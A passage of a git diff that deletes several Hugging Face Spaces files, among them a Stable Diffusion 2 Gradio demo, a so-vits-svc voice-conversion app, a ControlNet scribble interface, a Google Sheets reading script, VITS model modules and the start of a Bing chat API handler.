= 768 - opt.H = 768 - - start_code = None - if opt.fixed_code: - start_code = torch.randn([opt.n_samples, opt.C, opt.H // opt.f, opt.W // opt.f], device=device) - - precision_scope = autocast if opt.precision == "autocast" else nullcontext - image_samples = [] - with torch.no_grad(), \ - precision_scope("cuda"), \ - model.ema_scope(): - all_samples = list() - for n in trange(opt.n_iter, desc="Sampling"): - for prompts in tqdm(data, desc="data"): - uc = None - if opt.scale != 1.0: - uc = model.get_learned_conditioning(batch_size * [""]) - if isinstance(prompts, tuple): - prompts = list(prompts) - c = model.get_learned_conditioning(prompts) - shape = [opt.C, opt.H // opt.f, opt.W // opt.f] - samples, _ = sampler.sample(S=opt.steps, - conditioning=c, - batch_size=opt.n_samples, - shape=shape, - verbose=False, - unconditional_guidance_scale=opt.scale, - unconditional_conditioning=uc, - eta=opt.ddim_eta, - x_T=start_code) - - x_samples = model.decode_first_stage(samples) - x_samples = torch.clamp((x_samples + 1.0) / 2.0, min=0.0, max=1.0) - - for x_sample in x_samples: - x_sample = 255. * rearrange(x_sample.cpu().numpy(), 'c h w -> h w c') - img = Image.fromarray(x_sample.astype(np.uint8)) - img = put_watermark(img, wm_encoder) - image_samples.append(img) - base_count += 1 - sample_count += 1 - - all_samples.append(x_samples) - return image_samples - -css = """ - .gradio-container { - font-family: 'IBM Plex Sans', sans-serif; - } - .gr-button { - color: white; - border-color: black; - background: black; - } - input[type='range'] { - accent-color: black; - } - .dark input[type='range'] { - accent-color: #dfdfdf; - } - .container { - max-width: 730px; - margin: auto; - padding-top: 1.5rem; - } - #gallery { - min-height: 22rem; - margin-bottom: 15px; - margin-left: auto; - margin-right: auto; - border-bottom-right-radius: .5rem !important; - border-bottom-left-radius: .5rem !important; - } - #gallery>div>.h-full { - min-height: 20rem; - } - .details:hover { - text-decoration: underline; - } - .gr-button { - white-space: nowrap; - } - .gr-button:focus { - border-color: rgb(147 197 253 / var(--tw-border-opacity)); - outline: none; - box-shadow: var(--tw-ring-offset-shadow), var(--tw-ring-shadow), var(--tw-shadow, 0 0 #0000); - --tw-border-opacity: 1; - --tw-ring-offset-shadow: var(--tw-ring-inset) 0 0 0 var(--tw-ring-offset-width) var(--tw-ring-offset-color); - --tw-ring-shadow: var(--tw-ring-inset) 0 0 0 calc(3px var(--tw-ring-offset-width)) var(--tw-ring-color); - --tw-ring-color: rgb(191 219 254 / var(--tw-ring-opacity)); - --tw-ring-opacity: .5; - } - #advanced-btn { - font-size: .7rem !important; - line-height: 19px; - margin-top: 12px; - margin-bottom: 12px; - padding: 2px 8px; - border-radius: 14px !important; - } - #advanced-options { - display: none; - margin-bottom: 20px; - } - .footer { - margin-bottom: 45px; - margin-top: 35px; - text-align: center; - border-bottom: 1px solid #e5e5e5; - } - .footer>p { - font-size: .8rem; - display: inline-block; - padding: 0 10px; - transform: translateY(10px); - background: white; - } - .dark .footer { - border-color: #303030; - } - .dark .footer>p { - background: #0b0f19; - } - .acknowledgments h4{ - margin: 1.25em 0 .25em 0; - font-weight: bold; - font-size: 115%; - } - .animate-spin { - animation: spin 1s linear infinite; - } - @keyframes spin { - from { - transform: rotate(0deg); - } - to { - transform: rotate(360deg); - } - } - #share-btn-container { - display: flex; padding-left: 0.5rem !important; padding-right: 0.5rem !important; background-color: #000000; justify-content: center; align-items: center; border-radius: 9999px !important; width: 13rem; - margin-top: 10px; - margin-left: auto; - } - #share-btn { - all: initial; color: #ffffff;font-weight: 600; cursor:pointer; font-family: 'IBM Plex Sans', sans-serif; margin-left: 0.5rem !important; padding-top: 0.25rem !important; padding-bottom: 0.25rem !important;right:0; - } - #share-btn * { - all: unset; - } - #share-btn-container div:nth-child(-n+2){ - width: auto !important; - min-height: 0px !important; - } - #share-btn-container .wrap { - display: none !important; - } - .gr-form{ - flex: 1 1 50%; border-top-right-radius: 0; border-bottom-right-radius: 0; - } - #prompt-container{ - gap: 0; - } - #component-14{border-top-width: 1px !important} -""" - -block = gr.Blocks(css=css) - -examples = [ - [ - 'A high tech solarpunk utopia in the Amazon rainforest', - 4, - 45, - 7.5, - 1024, - ], - [ - 'A pikachu fine dining with a view to the Eiffel Tower', - 4, - 45, - 7, - 1024, - ], - [ - 'A mecha robot in a favela in expressionist style', - 4, - 45, - 7, - 1024, - ], - [ - 'an insect robot preparing a delicious meal', - 4, - 45, - 7, - 1024, - ], - [ - "A small cabin on top of a snowy mountain in the style of Disney, artstation", - 4, - 45, - 7, - 1024, - ], -] - -with block: - gr.HTML( - """ -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    - Stable Diffusion 2 Demo -

    -
    -

    - Stable Diffusion 2 is the latest text-to-image model from StabilityAI. Access Stable Diffusion 1 Space here
    For faster generation and API - access you can try - DreamStudio Beta -

    -
    - """ - ) - with gr.Group(): - with gr.Box(): - with gr.Row(elem_id="prompt-container").style(mobile_collapse=False, equal_height=True): - text = gr.Textbox( - label="Enter your prompt", - show_label=False, - max_lines=1, - placeholder="Enter your prompt", - elem_id="prompt-text-input", - ).style( - border=(True, False, True, True), - rounded=(True, False, False, True), - container=False, - ) - btn = gr.Button("Generate image").style( - margin=False, - rounded=(False, True, True, False), - full_width=False, - ) - - gallery = gr.Gallery( - label="Generated images", show_label=False, elem_id="gallery" - ).style(grid=[2], height="auto") - - - - with gr.Accordion("Custom options", open=False): - samples = gr.Slider(label="Images", minimum=1, maximum=4, value=4, step=1) - steps = gr.Slider(label="Steps", minimum=1, maximum=50, value=25, step=1) - scale = gr.Slider( - label="Guidance Scale", minimum=0, maximum=50, value=9, step=0.1 - ) - seed = gr.Slider( - label="Seed", - minimum=0, - maximum=2147483647, - step=1, - randomize=True, - ) - - with gr.Group(): - with gr.Group(elem_id="share-btn-container"): - community_icon = gr.HTML(community_icon_html) - loading_icon = gr.HTML(loading_icon_html) - share_button = gr.Button("Share to community", elem_id="share-btn") - - ex = gr.Examples(examples=examples, fn=infer, inputs=[text, samples, steps, scale, seed], outputs=[gallery, community_icon, loading_icon, share_button], cache_examples=False) - ex.dataset.headers = [""] - - text.submit(infer, inputs=[text, samples, steps, scale, seed], outputs=[gallery]) - btn.click(infer, inputs=[text, samples, steps, scale, seed], outputs=[gallery]) - - share_button.click( - None, - [], - [], - _js=share_js, - ) - gr.HTML( - """ - -
    -

    LICENSE

    -The model is licensed with a CreativeML OpenRAIL++ license. The authors claim no rights on the outputs you generate, you are free to use them and are accountable for their use which must not go against the provisions set in this license. The license forbids you from sharing any content that violates any laws, produce any harm to a person, disseminate any personal information that would be meant for harm, spread misinformation and target vulnerable groups. For the full list of restrictions please read the license

    -

    Biases and content acknowledgment

    -Despite how impressive being able to turn text into image is, beware to the fact that this model may output content that reinforces or exacerbates societal biases, as well as realistic faces, pornography and violence. The model was trained on the LAION-5B dataset, which scraped non-curated image-text-pairs from the internet (the exception being the removal of illegal content) and is meant for research purposes. You can read more in the model card

    -
    - """ - ) - -block.queue(concurrency_count=1, max_size=25).launch(max_threads=150) \ No newline at end of file diff --git a/spaces/vorstcavry/vits-models-1/app.py b/spaces/vorstcavry/vits-models-1/app.py deleted file mode 100644 index a4739cd869f6fa5ff3a1cfd530381c878467bf87..0000000000000000000000000000000000000000 --- a/spaces/vorstcavry/vits-models-1/app.py +++ /dev/null @@ -1,139 +0,0 @@ -import os -import io -import gradio as gr -import librosa -import numpy as np -import utils -from inference.infer_tool import Svc -import logging -import soundfile -import asyncio -import argparse -import edge_tts -import gradio.processing_utils as gr_processing_utils -logging.getLogger('numba').setLevel(logging.WARNING) -logging.getLogger('markdown_it').setLevel(logging.WARNING) -logging.getLogger('urllib3').setLevel(logging.WARNING) -logging.getLogger('matplotlib').setLevel(logging.WARNING) - -limitation = os.getenv("SYSTEM") == "spaces" # limit audio length in huggingface spaces - -audio_postprocess_ori = gr.Audio.postprocess - -def audio_postprocess(self, y): - data = audio_postprocess_ori(self, y) - if data is None: - return None - return gr_processing_utils.encode_url_or_file_to_base64(data["name"]) - - -gr.Audio.postprocess = audio_postprocess -def create_vc_fn(model, sid): - def vc_fn(input_audio, vc_transform, auto_f0, tts_text, tts_voice, tts_mode): - if tts_mode: - if len(tts_text) > 100 and limitation: - return "Text is too long", None - if tts_text is None or tts_voice is None: - return "You need to enter text and select a voice", None - asyncio.run(edge_tts.Communicate(tts_text, "-".join(tts_voice.split('-')[:-1])).save("tts.mp3")) - audio, sr = librosa.load("tts.mp3", sr=16000, mono=True) - raw_path = io.BytesIO() - soundfile.write(raw_path, audio, 16000, format="wav") - raw_path.seek(0) - out_audio, out_sr = model.infer(sid, vc_transform, raw_path, - auto_predict_f0=auto_f0, - ) - return "Success", (44100, out_audio.cpu().numpy()) - if input_audio is None: - return "You need to upload an audio", None - sampling_rate, audio = input_audio - duration = audio.shape[0] / sampling_rate - audio = (audio / np.iinfo(audio.dtype).max).astype(np.float32) - if len(audio.shape) > 1: - audio = librosa.to_mono(audio.transpose(1, 0)) - if sampling_rate != 16000: - audio = librosa.resample(audio, orig_sr=sampling_rate, target_sr=16000) - raw_path = io.BytesIO() - soundfile.write(raw_path, audio, 16000, format="wav") - raw_path.seek(0) - out_audio, out_sr = model.infer(sid, vc_transform, raw_path, - auto_predict_f0=auto_f0, - ) - return "Success", (44100, out_audio.cpu().numpy()) - return vc_fn - -def change_to_tts_mode(tts_mode): - if tts_mode: - return gr.Audio.update(visible=False), gr.Textbox.update(visible=True), gr.Dropdown.update(visible=True), gr.Checkbox.update(value=True) - else: - return gr.Audio.update(visible=True), gr.Textbox.update(visible=False), gr.Dropdown.update(visible=False), gr.Checkbox.update(value=False) - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument('--device', type=str, default='cpu') - parser.add_argument('--api', action="store_true", default=False) - parser.add_argument("--share", action="store_true", default=False, help="share gradio app") - args = parser.parse_args() - hubert_model = utils.get_hubert_model().to(args.device) - models = [] - others = { - "rudolf": "https://huggingface.co/spaces/sayashi/sovits-rudolf", - "teio": "https://huggingface.co/spaces/sayashi/sovits-teio", - "goldship": "https://huggingface.co/spaces/sayashi/sovits-goldship", - "tannhauser": "https://huggingface.co/spaces/sayashi/sovits-tannhauser" - } - voices = [] - tts_voice_list = asyncio.get_event_loop().run_until_complete(edge_tts.list_voices()) - for r in tts_voice_list: - voices.append(f"{r['ShortName']}-{r['Gender']}") - for f in os.listdir("models"): - name = f - model = Svc(fr"models/{f}/{f}.pth", f"models/{f}/config.json", device=args.device) - cover = f"models/{f}/cover.png" if os.path.exists(f"models/{f}/cover.png") else None - models.append((name, cover, create_vc_fn(model, name))) - with gr.Blocks() as app: - gr.Markdown( - "#
    Sovits Models\n" - "##
    The input audio should be clean and pure voice without background music.\n" - "![visitor badge](https://visitor-badge.glitch.me/badge?page_id=sayashi.Sovits-Umamusume)\n\n" - "[![image](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/drive/1wfsBbMzmtLflOJeqc5ZnJiLY7L239hJW?usp=share_link)\n\n" - "[![Duplicate this Space](https://huggingface.co/datasets/huggingface/badges/raw/main/duplicate-this-space-sm-dark.svg)](https://huggingface.co/spaces/sayashi/sovits-models?duplicate=true)\n\n" - "[![Original Repo](https://badgen.net/badge/icon/github?icon=github&label=Original%20Repo)](https://github.com/svc-develop-team/so-vits-svc)" - - ) - with gr.Tabs(): - for (name, cover, vc_fn) in models: - with gr.TabItem(name): - with gr.Row(): - gr.Markdown( - '
    ' - f'' if cover else "" - '
    ' - ) - with gr.Row(): - with gr.Column(): - vc_input = gr.Audio(label="Input audio"+' (less than 20 seconds)' if limitation else '') - vc_transform = gr.Number(label="vc_transform", value=0) - auto_f0 = gr.Checkbox(label="auto_f0", value=False) - tts_mode = gr.Checkbox(label="tts (use edge-tts as input)", value=False) - tts_text = gr.Textbox(visible=False, label="TTS text (100 words limitation)" if limitation else "TTS text") - tts_voice = gr.Dropdown(choices=voices, visible=False) - vc_submit = gr.Button("Generate", variant="primary") - with gr.Column(): - vc_output1 = gr.Textbox(label="Output Message") - vc_output2 = gr.Audio(label="Output Audio") - vc_submit.click(vc_fn, [vc_input, vc_transform, auto_f0, tts_text, tts_voice, tts_mode], [vc_output1, vc_output2]) - tts_mode.change(change_to_tts_mode, [tts_mode], [vc_input, tts_text, tts_voice, auto_f0]) - for category, link in others.items(): - with gr.TabItem(category): - gr.Markdown( - f''' -
    -

    Click to Go

    - - -
    - ''' - ) - app.queue(concurrency_count=1, api_open=args.api).launch(share=args.share) diff --git a/spaces/whitphx/gradio-static-test/dist/assets/Info-7e9477b8.js b/spaces/whitphx/gradio-static-test/dist/assets/Info-7e9477b8.js deleted file mode 100644 index fd29967b87fd0d3e31f46dcde75fb376b4ed7e94..0000000000000000000000000000000000000000 --- a/spaces/whitphx/gradio-static-test/dist/assets/Info-7e9477b8.js +++ /dev/null @@ -1,2 +0,0 @@ -import{S as i,i as r,s as u,W as f,H as _,D as c,h as p,Y as m,Z as d,$,q as v,t as g,r as h}from"../lite.js";import"./Button-0391b19a.js";function q(n){let s,a;const l=n[1].default,e=f(l,n,n[0],null);return{c(){s=_("div"),e&&e.c(),c(s,"class","svelte-e8n7p6")},m(t,o){p(t,s,o),e&&e.m(s,null),a=!0},p(t,[o]){e&&e.p&&(!a||o&1)&&m(e,l,t,t[0],a?$(l,t[0],o,null):d(t[0]),null)},i(t){a||(v(e,t),a=!0)},o(t){g(e,t),a=!1},d(t){t&&h(s),e&&e.d(t)}}}function I(n,s,a){let{$$slots:l={},$$scope:e}=s;return n.$$set=t=>{"$$scope"in t&&a(0,e=t.$$scope)},[e,l]}class C extends i{constructor(s){super(),r(this,s,I,q,u,{})}}export{C as I}; -//# sourceMappingURL=Info-7e9477b8.js.map diff --git a/spaces/willgibs/ControlNet-v1-1/app_scribble.py b/spaces/willgibs/ControlNet-v1-1/app_scribble.py deleted file mode 100644 index 39c14fe7918df45a93ec0485a793886d028142bd..0000000000000000000000000000000000000000 --- a/spaces/willgibs/ControlNet-v1-1/app_scribble.py +++ /dev/null @@ -1,107 +0,0 @@ -#!/usr/bin/env python - -import gradio as gr - -from utils import randomize_seed_fn - - -def create_demo(process, max_images=12, default_num_images=3): - with gr.Blocks() as demo: - with gr.Row(): - with gr.Column(): - image = gr.Image() - prompt = gr.Textbox(label='Prompt') - run_button = gr.Button('Run') - with gr.Accordion('Advanced options', open=False): - preprocessor_name = gr.Radio( - label='Preprocessor', - choices=['HED', 'PidiNet', 'None'], - type='value', - value='HED') - num_samples = gr.Slider(label='Number of images', - minimum=1, - maximum=max_images, - value=default_num_images, - step=1) - image_resolution = gr.Slider(label='Image resolution', - minimum=256, - maximum=512, - value=512, - step=256) - preprocess_resolution = gr.Slider( - label='Preprocess resolution', - minimum=128, - maximum=512, - value=512, - step=1) - num_steps = gr.Slider(label='Number of steps', - minimum=1, - maximum=100, - value=20, - step=1) - guidance_scale = gr.Slider(label='Guidance scale', - minimum=0.1, - maximum=30.0, - value=9.0, - step=0.1) - seed = gr.Slider(label='Seed', - minimum=0, - maximum=1000000, - step=1, - value=0, - randomize=True) - randomize_seed = gr.Checkbox(label='Randomize seed', - value=True) - a_prompt = gr.Textbox( - label='Additional prompt', - value='best quality, extremely detailed') - n_prompt = gr.Textbox( - label='Negative prompt', - value= - 'longbody, lowres, bad anatomy, bad hands, missing fingers, extra digit, fewer digits, cropped, worst quality, low quality' - ) - with gr.Column(): - result = gr.Gallery(label='Output', show_label=False).style( - columns=2, object_fit='scale-down') - inputs = [ - image, - prompt, - a_prompt, - n_prompt, - num_samples, - image_resolution, - preprocess_resolution, - num_steps, - guidance_scale, - seed, - preprocessor_name, - ] - prompt.submit( - fn=randomize_seed_fn, - inputs=[seed, randomize_seed], - outputs=seed, - queue=False, - ).then( - fn=process, - inputs=inputs, - outputs=result, - ) - run_button.click( - fn=randomize_seed_fn, - inputs=[seed, randomize_seed], - outputs=seed, - queue=False, - ).then( - fn=process, - inputs=inputs, - outputs=result, - api_name='scribble', - ) - return demo - - -if __name__ == '__main__': - from model import Model - model = Model(task_name='scribble') - demo = create_demo(model.process_scribble) - demo.queue().launch() diff --git a/spaces/wonbeom/prompter_day_demo1/spreadsheet.py b/spaces/wonbeom/prompter_day_demo1/spreadsheet.py deleted file mode 100644 index 21c46422fff5843d1947141f2947bd2860cb01d4..0000000000000000000000000000000000000000 --- a/spaces/wonbeom/prompter_day_demo1/spreadsheet.py +++ /dev/null @@ -1,38 +0,0 @@ -import pickle -import os.path -from google_auth_oauthlib.flow import InstalledAppFlow -from google.auth.transport.requests import Request -from googleapiclient.discovery import build - -# API 호출 시 필요한 스코프 설정 -SCOPES = ['https://www.googleapis.com/auth/spreadsheets'] - -# 사용자 인증 정보 얻기 및 Google Sheets API 서비스 객체 생성 -creds = None -if os.path.exists('token.pickle'): - with open('token.pickle', 'rb') as token: - creds = pickle.load(token) - -if not creds or not creds.valid: - if creds and creds.expired and creds.refresh_token: - creds.refresh(Request()) - else: - flow = InstalledAppFlow.from_client_secrets_file('credentials.json', SCOPES) - creds = flow.run_local_server(port=0) - with open('token.pickle', 'wb') as token: - pickle.dump(creds, token) - -service = build('sheets', 'v4', credentials=creds) - -# 스프레드시트 API 호출 -SPREADSHEET_ID = '14yCWD9JQWIcPhBejCtWeiSYeh6O8yFz9hNSJIbXZIkc' -RANGE_NAME = 'Sheet1!A1:A7' - -result = service.spreadsheets().values().get(spreadsheetId=SPREADSHEET_ID, range=RANGE_NAME).execute() -values = result.get('values', []) - -if not values: - print('No data found.') -else: - for row in values: - print(', '.join(row)) \ No newline at end of file diff --git a/spaces/wonderit-safeai/tts-announcer/modules.py b/spaces/wonderit-safeai/tts-announcer/modules.py deleted file mode 100644 index 9c7fd9cd6eb8b7e0ec0e08957e970744a374a924..0000000000000000000000000000000000000000 --- a/spaces/wonderit-safeai/tts-announcer/modules.py +++ /dev/null @@ -1,390 +0,0 @@ -import copy -import math -import numpy as np -import scipy -import torch -from torch import nn -from torch.nn import functional as F - -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm - -import commons -from commons import init_weights, get_padding -from transforms import piecewise_rational_quadratic_transform - - -LRELU_SLOPE = 0.1 - - -class LayerNorm(nn.Module): - def __init__(self, channels, eps=1e-5): - super().__init__() - self.channels = channels - self.eps = eps - - self.gamma = nn.Parameter(torch.ones(channels)) - self.beta = nn.Parameter(torch.zeros(channels)) - - def forward(self, x): - x = x.transpose(1, -1) - x = F.layer_norm(x, (self.channels,), self.gamma, self.beta, self.eps) - return x.transpose(1, -1) - - -class ConvReluNorm(nn.Module): - def __init__(self, in_channels, hidden_channels, out_channels, kernel_size, n_layers, p_dropout): - super().__init__() - self.in_channels = in_channels - self.hidden_channels = hidden_channels - self.out_channels = out_channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.p_dropout = p_dropout - assert n_layers > 1, "Number of layers should be larger than 0." - - self.conv_layers = nn.ModuleList() - self.norm_layers = nn.ModuleList() - self.conv_layers.append(nn.Conv1d(in_channels, hidden_channels, kernel_size, padding=kernel_size//2)) - self.norm_layers.append(LayerNorm(hidden_channels)) - self.relu_drop = nn.Sequential( - nn.ReLU(), - nn.Dropout(p_dropout)) - for _ in range(n_layers-1): - self.conv_layers.append(nn.Conv1d(hidden_channels, hidden_channels, kernel_size, padding=kernel_size//2)) - self.norm_layers.append(LayerNorm(hidden_channels)) - self.proj = nn.Conv1d(hidden_channels, out_channels, 1) - self.proj.weight.data.zero_() - self.proj.bias.data.zero_() - - def forward(self, x, x_mask): - x_org = x - for i in range(self.n_layers): - x = self.conv_layers[i](x * x_mask) - x = self.norm_layers[i](x) - x = self.relu_drop(x) - x = x_org + self.proj(x) - return x * x_mask - - -class DDSConv(nn.Module): - """ - Dialted and Depth-Separable Convolution - """ - def __init__(self, channels, kernel_size, n_layers, p_dropout=0.): - super().__init__() - self.channels = channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.p_dropout = p_dropout - - self.drop = nn.Dropout(p_dropout) - self.convs_sep = nn.ModuleList() - self.convs_1x1 = nn.ModuleList() - self.norms_1 = nn.ModuleList() - self.norms_2 = nn.ModuleList() - for i in range(n_layers): - dilation = kernel_size ** i - padding = (kernel_size * dilation - dilation) // 2 - self.convs_sep.append(nn.Conv1d(channels, channels, kernel_size, - groups=channels, dilation=dilation, padding=padding - )) - self.convs_1x1.append(nn.Conv1d(channels, channels, 1)) - self.norms_1.append(LayerNorm(channels)) - self.norms_2.append(LayerNorm(channels)) - - def forward(self, x, x_mask, g=None): - if g is not None: - x = x + g - for i in range(self.n_layers): - y = self.convs_sep[i](x * x_mask) - y = self.norms_1[i](y) - y = F.gelu(y) - y = self.convs_1x1[i](y) - y = self.norms_2[i](y) - y = F.gelu(y) - y = self.drop(y) - x = x + y - return x * x_mask - - -class WN(torch.nn.Module): - def __init__(self, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=0, p_dropout=0): - super(WN, self).__init__() - assert(kernel_size % 2 == 1) - self.hidden_channels =hidden_channels - self.kernel_size = kernel_size, - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - self.p_dropout = p_dropout - - self.in_layers = torch.nn.ModuleList() - self.res_skip_layers = torch.nn.ModuleList() - self.drop = nn.Dropout(p_dropout) - - if gin_channels != 0: - cond_layer = torch.nn.Conv1d(gin_channels, 2*hidden_channels*n_layers, 1) - self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name='weight') - - for i in range(n_layers): - dilation = dilation_rate ** i - padding = int((kernel_size * dilation - dilation) / 2) - in_layer = torch.nn.Conv1d(hidden_channels, 2*hidden_channels, kernel_size, - dilation=dilation, padding=padding) - in_layer = torch.nn.utils.weight_norm(in_layer, name='weight') - self.in_layers.append(in_layer) - - # last one is not necessary - if i < n_layers - 1: - res_skip_channels = 2 * hidden_channels - else: - res_skip_channels = hidden_channels - - res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1) - res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name='weight') - self.res_skip_layers.append(res_skip_layer) - - def forward(self, x, x_mask, g=None, **kwargs): - output = torch.zeros_like(x) - n_channels_tensor = torch.IntTensor([self.hidden_channels]) - - if g is not None: - g = self.cond_layer(g) - - for i in range(self.n_layers): - x_in = self.in_layers[i](x) - if g is not None: - cond_offset = i * 2 * self.hidden_channels - g_l = g[:,cond_offset:cond_offset+2*self.hidden_channels,:] - else: - g_l = torch.zeros_like(x_in) - - acts = commons.fused_add_tanh_sigmoid_multiply( - x_in, - g_l, - n_channels_tensor) - acts = self.drop(acts) - - res_skip_acts = self.res_skip_layers[i](acts) - if i < self.n_layers - 1: - res_acts = res_skip_acts[:,:self.hidden_channels,:] - x = (x + res_acts) * x_mask - output = output + res_skip_acts[:,self.hidden_channels:,:] - else: - output = output + res_skip_acts - return output * x_mask - - def remove_weight_norm(self): - if self.gin_channels != 0: - torch.nn.utils.remove_weight_norm(self.cond_layer) - for l in self.in_layers: - torch.nn.utils.remove_weight_norm(l) - for l in self.res_skip_layers: - torch.nn.utils.remove_weight_norm(l) - - -class ResBlock1(torch.nn.Module): - def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)): - super(ResBlock1, self).__init__() - self.convs1 = nn.ModuleList([ - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[2], - padding=get_padding(kernel_size, dilation[2]))) - ]) - self.convs1.apply(init_weights) - - self.convs2 = nn.ModuleList([ - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=1, - padding=get_padding(kernel_size, 1))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=1, - padding=get_padding(kernel_size, 1))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=1, - padding=get_padding(kernel_size, 1))) - ]) - self.convs2.apply(init_weights) - - def forward(self, x, x_mask=None): - for c1, c2 in zip(self.convs1, self.convs2): - xt = F.leaky_relu(x, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c1(xt) - xt = F.leaky_relu(xt, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c2(xt) - x = xt + x - if x_mask is not None: - x = x * x_mask - return x - - def remove_weight_norm(self): - for l in self.convs1: - remove_weight_norm(l) - for l in self.convs2: - remove_weight_norm(l) - - -class ResBlock2(torch.nn.Module): - def __init__(self, channels, kernel_size=3, dilation=(1, 3)): - super(ResBlock2, self).__init__() - self.convs = nn.ModuleList([ - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]))) - ]) - self.convs.apply(init_weights) - - def forward(self, x, x_mask=None): - for c in self.convs: - xt = F.leaky_relu(x, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c(xt) - x = xt + x - if x_mask is not None: - x = x * x_mask - return x - - def remove_weight_norm(self): - for l in self.convs: - remove_weight_norm(l) - - -class Log(nn.Module): - def forward(self, x, x_mask, reverse=False, **kwargs): - if not reverse: - y = torch.log(torch.clamp_min(x, 1e-5)) * x_mask - logdet = torch.sum(-y, [1, 2]) - return y, logdet - else: - x = torch.exp(x) * x_mask - return x - - -class Flip(nn.Module): - def forward(self, x, *args, reverse=False, **kwargs): - x = torch.flip(x, [1]) - if not reverse: - logdet = torch.zeros(x.size(0)).to(dtype=x.dtype, device=x.device) - return x, logdet - else: - return x - - -class ElementwiseAffine(nn.Module): - def __init__(self, channels): - super().__init__() - self.channels = channels - self.m = nn.Parameter(torch.zeros(channels,1)) - self.logs = nn.Parameter(torch.zeros(channels,1)) - - def forward(self, x, x_mask, reverse=False, **kwargs): - if not reverse: - y = self.m + torch.exp(self.logs) * x - y = y * x_mask - logdet = torch.sum(self.logs * x_mask, [1,2]) - return y, logdet - else: - x = (x - self.m) * torch.exp(-self.logs) * x_mask - return x - - -class ResidualCouplingLayer(nn.Module): - def __init__(self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - p_dropout=0, - gin_channels=0, - mean_only=False): - assert channels % 2 == 0, "channels should be divisible by 2" - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.half_channels = channels // 2 - self.mean_only = mean_only - - self.pre = nn.Conv1d(self.half_channels, hidden_channels, 1) - self.enc = WN(hidden_channels, kernel_size, dilation_rate, n_layers, p_dropout=p_dropout, gin_channels=gin_channels) - self.post = nn.Conv1d(hidden_channels, self.half_channels * (2 - mean_only), 1) - self.post.weight.data.zero_() - self.post.bias.data.zero_() - - def forward(self, x, x_mask, g=None, reverse=False): - x0, x1 = torch.split(x, [self.half_channels]*2, 1) - h = self.pre(x0) * x_mask - h = self.enc(h, x_mask, g=g) - stats = self.post(h) * x_mask - if not self.mean_only: - m, logs = torch.split(stats, [self.half_channels]*2, 1) - else: - m = stats - logs = torch.zeros_like(m) - - if not reverse: - x1 = m + x1 * torch.exp(logs) * x_mask - x = torch.cat([x0, x1], 1) - logdet = torch.sum(logs, [1,2]) - return x, logdet - else: - x1 = (x1 - m) * torch.exp(-logs) * x_mask - x = torch.cat([x0, x1], 1) - return x - - -class ConvFlow(nn.Module): - def __init__(self, in_channels, filter_channels, kernel_size, n_layers, num_bins=10, tail_bound=5.0): - super().__init__() - self.in_channels = in_channels - self.filter_channels = filter_channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.num_bins = num_bins - self.tail_bound = tail_bound - self.half_channels = in_channels // 2 - - self.pre = nn.Conv1d(self.half_channels, filter_channels, 1) - self.convs = DDSConv(filter_channels, kernel_size, n_layers, p_dropout=0.) - self.proj = nn.Conv1d(filter_channels, self.half_channels * (num_bins * 3 - 1), 1) - self.proj.weight.data.zero_() - self.proj.bias.data.zero_() - - def forward(self, x, x_mask, g=None, reverse=False): - x0, x1 = torch.split(x, [self.half_channels]*2, 1) - h = self.pre(x0) - h = self.convs(h, x_mask, g=g) - h = self.proj(h) * x_mask - - b, c, t = x0.shape - h = h.reshape(b, c, -1, t).permute(0, 1, 3, 2) # [b, cx?, t] -> [b, c, t, ?] - - unnormalized_widths = h[..., :self.num_bins] / math.sqrt(self.filter_channels) - unnormalized_heights = h[..., self.num_bins:2*self.num_bins] / math.sqrt(self.filter_channels) - unnormalized_derivatives = h[..., 2 * self.num_bins:] - - x1, logabsdet = piecewise_rational_quadratic_transform(x1, - unnormalized_widths, - unnormalized_heights, - unnormalized_derivatives, - inverse=reverse, - tails='linear', - tail_bound=self.tail_bound - ) - - x = torch.cat([x0, x1], 1) * x_mask - logdet = torch.sum(logabsdet * x_mask, [1,2]) - if not reverse: - return x, logdet - else: - return x diff --git a/spaces/wy213/213a/src/pages/api/sydney.ts b/spaces/wy213/213a/src/pages/api/sydney.ts deleted file mode 100644 index 0e7bbf23d77c2e1a6635185a060eeee58b8c8e66..0000000000000000000000000000000000000000 --- a/spaces/wy213/213a/src/pages/api/sydney.ts +++ /dev/null @@ -1,62 +0,0 @@ -import { NextApiRequest, NextApiResponse } from 'next' -import { WebSocket, debug } from '@/lib/isomorphic' -import { BingWebBot } from '@/lib/bots/bing' -import { websocketUtils } from '@/lib/bots/bing/utils' -import { WatchDog, createHeaders } from '@/lib/utils' - - -export default async function handler(req: NextApiRequest, res: NextApiResponse) { - const conversationContext = req.body - const headers = createHeaders(req.cookies) - debug(headers) - res.setHeader('Content-Type', 'text/stream; 